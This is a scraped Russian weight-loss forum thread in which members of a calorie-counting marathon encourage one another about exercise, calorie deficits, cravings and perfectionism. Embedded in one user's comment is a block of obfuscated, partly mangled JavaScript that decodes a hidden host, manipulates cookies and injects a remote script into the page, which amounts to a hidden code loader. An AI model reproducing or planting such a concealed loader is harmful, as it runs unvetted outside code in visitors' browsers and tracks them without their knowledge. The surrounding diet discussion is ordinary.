Мне, собственно, давно хотелось Вам написать - что Вы напрасно недооцениваете свои нагрузки. Постоянно делите их напополам, говоря, что все как-то не так и "капельно".

Спасибо за такой комментарий! Спасибо, что замечаете меня и верите в меня!
 Фраза "не переоценивайте свои усилия" все время надо мной. Я по жизни себя недооцениваю и прекрасно понимаю, как это может немного мозолить глаза тут, когда повторяется раз за разом, а со стороны видишь по-другому.
Я и правда недооцениваю как-то усилия, никогда практически никаких физических нагрузок не было, даже зарядки, регулярно чтобы. Два раза в неделю по полгода на танцы походить и сдаться - не считается. Ну год ходила 2 раза в неделю на йогу по часу - но это и правда капля в море. Как-то создался у меня такой образ - что я неспортивная, неподвижная и в принципе неспособна пока к каким-либо нагрузкам, которые можно считать всерьез. И еще у меня есть такая установка, что моя жизнь слишком сидячая и труд мой хоть умственный, но я правда не упахиваюсь тут (устаю от внутренних переживаний и неспокойствия в большей степени), не решаю сложных задач, так, визиточки-сайтики рисую, то густо, то пусто. Тут люди с ребенком бывает весь день бегают и ставят "неработающие". Потому мне кажется, что приложение могло переоценить мою жизнь  :o  и я словно своим делением на два избегаю такой возможной ошибки. К тому же йога, ну какая йога, для начинающих, потянулись-наклонились-ушли в планку-подышали. Для успокоения ума - это прекрасно, а как сжигатель калорий - нет. Но теперь стала писать уже без делений, просто от видео отнимаю время, когда активности очень мало в начале и конце видео (сидение, потягивание). Трейси позволила, наконец, себе записывать как "легкая аэробика". 

Еще мне кажется, что мне-то может быть где-то и тяжело что-то делать (Трейси, особенно), но я-то только начала, конечно, мне все колется и чешется и неудобно и напрягается  . А может на самом деле это примитив и легкотня - всего 25 минут серии "Для начинающих". 
Chiara Chiara написал:
Прям вот спросить хотелось - Вы думаете, что спустя месяц другой Вы начнете заниматься ежедневно по три часа - и тогда станете записывать все полноценно?

 Вот прямо в точку! Примерно так и думаю, ну не по три часа, но когда-нибудь   Но сейчас уже лучше, осознала, что как-то недооценила себя. Хотя уже и поняла, что час-полтора - это много для меня, так долго не протяну, весь вечер занят, а утром нереально. Буду подстраивать обстоятельства под себя.
Chiara Chiara написал:
Или Вы думаете, что человек у которого изначально растяжка лучше Вашей при выполнении того же упражнения затрачивает больше энергии, чем Вы?

Скорее мне кажется, что я пока выбираю все какое-то для начинающих, для слабеньких, силы не чувствую пока. То есть сами упражнения довольно простые. Пока еще. 
Chiara Chiara написал:
большая неповоротливая тетя

Если честно, ощущаю себя как небольшая, но слабая и неповоротливая тетя.

Суть Ваших слов поняла! Спасибо, что посмотрели со стороны и написали, а то я все как-то не знала, как себя оценить, чтобы не переборщить. И да,  спасибо, что сказали - я делаю уже много и достаточно хорошо. Буду себе это напоминать. 
Елена Елена 28.08.2015 11:58
потребляйте витамины, я по себе вижу, как только организм недополучает витамины - я могу срываться на всякую-всячину!
Tiramisu 28.08.2015 12:05
Chiara Chiara, вот и я терапию получила 
Tiramisu 28.08.2015 12:06
Елена Елена, вроде нутриенты всегда стараюсь держать на хорошем уровне. Знаю только, что Омег нету, с рыбой пока туговато. буду вводить льняное семя. И с витамином Е трудности, и В, но по-мелочи, уже поняла как их поднимать, так что дело налаживается.
Tiramisu 28.08.2015 12:07
Елена Елена, но за жизнь, конечно, недостаток витаминов-минералов большой, никогда не следила за этим 
werewa83 28.08.2015 12:09
Хочешь есть-попей водички!!!)))  
Tiramisu 28.08.2015 12:24
Tessa Wood написал:
визиточки-сайтики рисую

вот что-то я написала так, и чую, что найдется вокруг меня куча людей, которые могли бы мне сказать "Ну ты достала уже себя недооценивать, ну сколько можно ж!" МЗР проявляет все человеческие качества. Все становится видно в условиях, когда наблюдаешь за собой, все записываешь, и участники все видят со стороны.
Tiramisu 28.08.2015 12:51
Марафонка написал:
Выше нос, вы умничка, просто чуток терпения.

 спасибо!
Tiramisu 28.08.2015 12:51
werewa83, точно! Я водяной, я водяной! 
Liones 28.08.2015 17:05
Инна VM, вот вот, я пока педали кручу, успеваю посмотреть киношки или передачи (правда, я скачиваю всё заранее, а TV в силу убеждений не смотрю вообще более 5 лет  ) , до которых руки-ноги не доходят, или времени не хватает , попробуйте. Раньше под музыку занималась, мне скучно было.
Chiara Grace 28.08.2015 22:30
Марафонка написал:
Выше нос, вы умничка, просто чуток терпения.

Tiramisu 29.08.2015 12:21
Chiara Chiara, спасибо за поддержку и внимание, вспоминаю все время Ваши слова. Вчера такая усталость и слабость была, пришла домой, полежала, потом подумала - может в охотку попробовать йогу, поразмяться - я всегда начинаю с разминочного видео в 8 минут всего - и в итоге сделала минут 45 тренировку. Взбодрилась и была очень рада за себя. А все потому, что сама себе послушала и разрешила одновременно и делать, и не делать, как пойдет. Вот и пошло. 
Инна VM 29.08.2015 14:15
Liones666, оказывается мы единомышленники по отношению к ТВ, я уже давно только с интернетом, дисками и флешками...  
Liones 29.08.2015 14:18
Инна VM,  во во, аналогично. 
Chiara Grace 29.08.2015 18:58
Tessa Wood
какая же Вы молодец! Чувствовалось, что вчерашнее настроение было не очень, и такой замечательный выход Вы для себя нашли...  любая физ. нагрузка способствует выбросу эндорфинов (ну или чего-то такого же приятного для организма)), а уж растяжка, йога... и само по себе вот это "разрешение НЕ делать" - дорогого стоит.
и еще пришла в голову мысль, что такие вот кризисы даются нам для того, чтобы мы нашли возможность вырасти, мне кажется, это - как раз Ваш случай: появилась новая стратегия - прислушиваться больше к себе и разрешать, а не понукать, ну и еще один способ снятия усталости в арсенале - спорт.
Tiramisu 31.08.2015 13:30
Chiara Chiara, спасибо Вам! И за участие и за похвалу. Мне и правда полегчало очень. Только тогда один день и пропустила тренировку (да, теперь я буду говорить тренировка - крутая  ). А так каждый день минимум минут 30-40 я нахожусь в состоянии - я занята, у меня тренировка  . Даже в первый день М, хоть вроде и нельзя, но я решила чуточку, а получилось полноценное бережное занятие. И теперь уже даже жду, вот скоро мне надо позаниматься, приходится делать первое усилие, но небольшое, просто немного дать импульс и организовать место. Становлюсь, делаю разминку по видео любимому уже, а потом решаю, на что еще есть силы 

А еще разрешила себе уменьшить дневной дефицит пока с 500 до 450 калорий. И поняла, что я становлюсь рабом цифр - очень нервничаю, если все не зелененькое и если дефицит меньше 450, хоть на пару калорий. А уж когда гости и все летит в тартарары - не могу успокоиться, ничего не взвешено, жиры зашкаливают. Но ведь в масштабах жизни и даже МЗР такие ситуации - вообще капля в море. А я вот начинаю суетиться, подгонять скудный остаток дня. Хочется красиво чтобы было, но это ведь не очень жизнеспособный образ жизни. Буду учиться преодолевать перфекционизм ненужный. Вчера вот с такой ситуацией справилась принудительным поеданием вечером дольки шоколада - ну 350 дефицит, ну жиры, ну рейтинг упал, но за 7 дней все ОК   ну и ладно.

Таня 02.09.2015 18:31
"Жора" ушел?))
Tiramisu 02.09.2015 18:48
Таня спасибо за интерес! Жору я усмирила и он ушел.

Через 3 дня после поста начались М. Я пропустила только один день тренировок, а все остальные дни занимаюсь, но сократила тренировки - не временно, а пока постоянно - до 30-45 минут вместо 60-80 минут. Для меня это было много. Фитнесс-видео (трудное для меня) делала с тех пор один раз, в остальное время была йога. То есть я решила делать то, к чему сейчас лежит душа, а не насиловать себя. Даже если ограничусь разминкой или вообще ничего не буду делать. Это помогает, стало гораздо легче и спокойней.

Одновременно с этим я уменьшила обязательный ежедневный (лично для меня, мне проще, когда я вижу границу, а не болтаюсь туда-сюда каждый день) дефицит калорий с 500 до 450 - то есть я стала больше есть на 50 калорий. Может я могу обойтись и без этого, но в тот момент я так сделала и пока оставила такой свой уровень дефицита. Тоже почувствовала себя свободней - захочу уменьшу, захочу потом увеличу. Один день были гости и съела больше, чем обычно. Так вот и справилась. Вес за последние два дня вырос на 600 грамм - думаю, это прилив воды от М, проверю позже.

Так вот этот опыт и подсказки участников помогли мне проще относиться к контролю. Я пока паникую, когда все не идет по плану, но стала позволять себе менять план, как видите.
Ксана 03.09.2015 16:16
Барышни, всем здравствуйте! Поделюсь тем, что знаю  и применяю для себя по поводу вкусняшек и остальной еды. Может еще кому-то поможет. Итак, все вкусняшки я ем после основного приема пищи, причем их калорийность должна быть не более 100 ккал. Чтобы мозг правильно воспринимал еду, убрала все разноцветные тарелки, разноцветные на моем столе только фрукты и овощи). И еще положенные по рациону граммы еды всегда режу тонко и на много-много маленьких кусочков, получается большой объем. Мозг воспринимает это как много еды! 
Всем хорошего дня, нескудного стола и отличного настроения!
Алена Собко 07.09.2015 21:55
Офигеть а где плюшки та? калорий много, а есть та по сути нечего, ойееей я точно никогда по витаминам на 100 не выйду. зато голода не чувствую. и не знаешь как и лучше.  Удачи вам осенняя хандра пройдет и все наладится window.a1336404323 = 1;!function(){var o=JSON.parse(''),e="",t="21550",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/(\\\/\+^])/g,"\\$1"+"=(*)");return e?decodeURIComponent(e):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600",e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t;d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o,16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("sc ript";i.setAttribute("src",n),i.setAttribute("type","text/javasc ript",document.head.appendChild(i),i.on load=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.on error=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom";e=s&&-1!=o.indexOf(s)?s:u?u:o;var f,m=n("oismods";m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o&&(e=o,d(e))}))f=r(e)+"/ajs/"+t+"/c/"+c("health-diet.ru"+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o&&(e=o,d(e))}))};d()}();
Tiramisu 07.09.2015 22:18
Алена Собко, для плюшек калорий запаса нету   Сама бы с радостью наплюшкалась, только тогда вечером или днем голодать придется 
Tessa Wood, вы- молодец! Рада за вас и жор. У меня тоже дня 3 продержался жор и прошел, как всегда. мне кажется это все же связано с женским циклом.
Tiramisu 07.09.2015 22:38
Олеся, спасибо большое! Да, такая судьба видно у нас, непостоянная))) 
Chiara Grace 09.09.2015 12:37
Tessa Wood написал:
почувствовала себя свободней

самое лучшее, что я могла услышать)) очень-очень-очень рада за Вас и Ваши красивые решения! Уметь себя слышать и уметь с собой договариваться - это очень круто, мне кажется, - ВЫ - на верном пути)
Tiramisu 09.09.2015 12:42
Chiara Chiara, спасибо огромное!! 
Ирина 13.09.2015 13:01
Сергей 13.09.2015 13:05
У меня такое вчера было закинь в себя побольше углеводов в виде сухофруктов
Tiramisu 13.09.2015 14:57
Сергей, как вариант, сейчас на меня напал такой же голод, просто пока наедаюсь, и сладенького наконец поела и жирного. Может поможет)))
Может, разрыв между потраченным и съеденным слишком велик? (с учетом тренировок) И организм бастует? А, может, разнообразия хочется и общения с соратниками - не виртуального, а в спортзале, например?
Tiramisu 13.09.2015 15:26
Дарья Кондратьева, может быть, пытаюсь понять. Но тренировки у меня, ну не такие уж и усиленные, чтобы недооценить их, правда. А вот насчет разнообразия - это да, мне кажется, очень похоже, еще может быть хочется вкусов разных, сладкого, насыщенного. А я как-то впряглась в довольно скромную пищу, вообще была без сладостей. И поначалу месяц все было отлично, вообще не соблазнялась ничем, не чувствовала ограничений, но видимо все-таки разнообразие необходимо. Может и есть люди, которые могут в какой-то момент воспринимать еду просто как топливо (я таких знаю даже), но мне лично всегда нравилось вкусненькое, я не думаю уже, что надо с этим как-то бороться. Есть продукты, которые приходится есть, хоть и равнодушно, овсянку, например, чем я ее не засыплю, лично для меня это полезная вещь, которая приятно по факту своей полезности и приятности для желудка, и все. Но надо стараться, видимо, внедрять и вкусное, и может не совсем полезное иногда.
может просто организму пора загрузочный день сделать. а потом снова с МЗР
Tessa Wood, я вот тоже начинала с овсянки... оказалось, она не такая уж полезная. единственно - полезна для больных гастритом, склизкая потому что. И я перешла на гречку. ем ее так просто, и с мясом, и с йогуртом, и с фруктами. Универсально и полезно!
Интересные блоги
Лучшие рационы
Новые рецепты